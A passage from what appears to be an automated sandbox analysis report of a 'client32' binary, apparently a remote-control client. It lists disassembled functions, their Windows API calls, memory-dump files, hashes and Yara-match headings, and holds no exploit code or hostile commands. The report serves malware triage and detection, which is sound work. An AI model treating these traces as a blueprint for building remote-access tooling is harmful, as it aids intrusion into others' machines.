                                                                                  • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                  • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                  • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                  • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Item$ClassMessageNamePostTextWindow
                                                                                  • String ID: #32770$Tapiexe
                                                                                  • API String ID: 3170390011-3313516769
                                                                                  • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                  • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                  • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                  • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                  Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                    • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                  • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                  • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                  • SetFocus.USER32(00000000), ref: 11023417
                                                                                  • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                  • API String ID: 1605826578-1986719024
                                                                                  • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                  • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                  • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                  • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                  Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                                  • _memset.LIBCMT ref: 1114515E
                                                                                  • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                                  • CreatePopupMenu.USER32 ref: 111451AA
                                                                                  • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                                  • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                                  • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 74472576-4108050209
                                                                                  • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                  • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                  • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                  • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                  Function 11039710 Relevance: 13.6, APIs: 9, Instructions: 132windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 11039768
                                                                                  • GetDlgItem.USER32(00000000,00000001), ref: 11039771
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 11039778
                                                                                  • PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
                                                                                  • GetParent.USER32(?), ref: 110397B6
                                                                                  • GetWindowRect.USER32(?,?), ref: 110397C3
                                                                                  • IntersectRect.USER32(?,?,?), ref: 110397FC
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 11039836
                                                                                  • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 818519836-0
                                                                                  • Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                  • Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
                                                                                  • Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                  • Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
                                                                                  Function 110CD940 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                    • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,76933760,00000000,111F1590,?,110CD955,00000000,76933760), ref: 111103E8
                                                                                    • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,7694A1D0,00000000,?,110CD955,00000000,76933760), ref: 11110408
                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,76933760,00000000,7694A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                  • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                  • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                  • IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
                                                                                  • DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1497311044-0
                                                                                  • Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                  • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                                  • Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                  • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                                  Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                                  • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                                  • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                                  • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                                  • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                                  • SetBkColor.GDI32(?,?), ref: 11113615
                                                                                  • SetTextColor.GDI32(?,?), ref: 11113620
                                                                                  • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                                  • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                  • String ID:
                                                                                  • API String ID: 1094208222-0
                                                                                  • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                  • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                  • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                  • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                  Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                                  • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                                  • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                                  • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                                  • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                                  • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                                  • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                                  • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                                  • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                  • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                  • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                  • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                  Function 11043240 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 244COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • _memset.LIBCMT ref: 110433A9
                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$__wcstoi64_memset
                                                                                  • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                  • API String ID: 3760389471-710950153
                                                                                  • Opcode ID: 219f2807627d3fca353150cd103efd45732b91eedb346247534d9a6fde96576b
                                                                                  • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                  • Opcode Fuzzy Hash: 219f2807627d3fca353150cd103efd45732b91eedb346247534d9a6fde96576b
                                                                                  • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                  Function 1101F4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
                                                                                  • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                                  • GetTextColor.GDI32(?), ref: 1101F645
                                                                                    • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                    • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                    • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                    • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                    • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                    • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                    • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                                  • String ID: VUUU$VUUU
                                                                                  • API String ID: 179481525-3149182767
                                                                                  • Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                  • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                                  • Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                  • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                                  Function 1103B420 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1103B476
                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
